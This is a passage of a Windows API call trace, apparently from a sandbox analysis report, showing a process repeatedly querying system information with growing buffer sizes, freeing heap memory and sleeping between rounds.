returned 0x29585b8 [0208.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.508] Sleep (dwMilliseconds=0x110) [0208.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.513] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.520] Sleep (dwMilliseconds=0x110) [0208.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.538] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.538] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.539] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.540] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.541] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.541] Sleep (dwMilliseconds=0x110) [0208.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.544] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.545] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.547] Sleep (dwMilliseconds=0x110) [0208.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.569] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.569] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.571] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.571] Sleep (dwMilliseconds=0x110) [0208.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.599] Sleep (dwMilliseconds=0x110) [0208.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.615] Sleep (dwMilliseconds=0x110) [0208.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.630] Sleep (dwMilliseconds=0x110) [0208.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.647] Sleep (dwMilliseconds=0x110) [0208.653] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.653] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.654] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.661] Sleep (dwMilliseconds=0x110) [0208.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.679] Sleep (dwMilliseconds=0x110) [0208.684] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.684] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.688] Sleep (dwMilliseconds=0x110) [0208.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.704] Sleep (dwMilliseconds=0x110) [0208.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.726] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0208.726] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0208.727] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.727] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0208.728] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.728] Sleep (dwMilliseconds=0x110) [0208.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0208.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0208.734] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0208.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0208.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0208.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 